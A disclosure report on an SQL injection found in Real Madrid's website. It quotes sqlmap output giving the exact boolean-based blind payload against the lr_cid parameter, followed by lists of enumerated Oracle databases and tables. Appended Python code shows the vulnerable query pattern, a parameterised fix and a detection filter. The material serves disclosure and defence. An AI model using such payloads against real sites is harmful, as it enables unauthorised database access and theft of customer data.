A Greek researcher managed to locate an important security gap on Real Madrid's official website, which allowed him to perform an SQL injection successfully and gain access to the team's database.
On October 10, Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate, and the problem was fixed within a few hours.
It is worth noting that the website's database had over 7,000 tables and many important items, such as millions of customer accounts from the team's official store.
Some vulnerability information:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c=RM_Noticia_FA&lr_cid=-8384 OR 8642=8642&lr_language=de&lr_pid=3&pagename=RealMadridResponsive/Comunes/Logica/urlCambioIdioma
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+---------------------+
| RLM$PARSEDCOND      |
+---------------------+
Database: XDB
[2 tables]
+---------------------+
| XDB$IMPORT_TT_INFO  |
| XDB$XIDX_IMP_T      |
+---------------------+
Database: APEX_030200
[3 tables]
+---------------------+
| WWV_FLOW_DUAL100    |
| WWV_FLOW_LOV_TEMP   |
| WWV_FLOW_TEMP_TABLE |
+---------------------+
Database: SYSTEM
[4 tables]
+---------------------+
| HELP                |
| OL$                 |
| OL$HINTS            |
| OL$NODES            |
+---------------------+
Database: FATWIREDLV
[3437 tables]
Database: SYS
[26 tables]
Database: MDSYS
[35 tables]
Raising awareness of vulnerabilities discovered in organizations is considered essential (especially when they affect high-traffic websites), and for us it is an immediate priority.
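Why the reported lr_cid payload changes the query result, and what closes it, as an added example that is not code from the site or the researcher. SQLite stands in for the Oracle back end, and the `news` table, its columns and the function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

INT_RE = re.compile(r"-?\d{1,18}")
NUMERIC_PARAMS = ("lr_cid", "lr_pid")  # parameters the report shows with integer values

def make_db():
    # Constructed stand-in: SQLite replaces Oracle; table and columns are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (cid INTEGER PRIMARY KEY, lang TEXT, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (101, "de", "Spielbericht"), (102, "de", "Interview"), (103, "es", "Cronica")])
    return db

def lookup_concatenated(db, lr_cid, lr_language):
    # Vulnerable pattern: lr_cid becomes part of the SQL text, so "x OR n=n"
    # rewrites the WHERE clause. Binding only lr_language does not help.
    sql = f"SELECT title FROM news WHERE cid = {lr_cid} AND lang = ?"
    return [row[0] for row in db.execute(sql, (lr_language,))]

def lookup_bound(db, lr_cid, lr_language):
    # Hardened pattern: reject anything that is not an integer, then bind it.
    if not INT_RE.fullmatch(lr_cid):
        raise ValueError("lr_cid must be an integer")
    sql = "SELECT title FROM news WHERE cid = ? AND lang = ?"
    return [row[0] for row in db.execute(sql, (int(lr_cid), lr_language))]

def suspicious_params(query_string):
    # Detection side: report numeric parameters whose decoded value is not an integer.
    params = parse_qs(query_string, keep_blank_values=True)
    return sorted(k for k in NUMERIC_PARAMS
                  for v in params.get(k, []) if not INT_RE.fullmatch(v))

# Constructed query strings modelled on the payload in the report (URL-encoded).
BENIGN = "lr_c=RM_Noticia_FA&lr_cid=101&lr_language=de&lr_pid=3"
TAUTOLOGY = "lr_c=RM_Noticia_FA&lr_cid=-8384%20OR%208642%3D8642&lr_language=de&lr_pid=3"

if __name__ == "__main__":
    db = make_db()
    cid = parse_qs(TAUTOLOGY)["lr_cid"][0]
    print(lookup_concatenated(db, "101", "de"))  # the single matching row
    print(lookup_concatenated(db, cid, "de"))    # every 'de' row: the condition is always true
    print(suspicious_params(BENIGN), suspicious_params(TAUTOLOGY))
```

The same integer check used in `lookup_bound` doubles as a log filter: any request where `lr_cid` or `lr_pid` fails it is worth alerting on, whether or not the query behind it is still injectable.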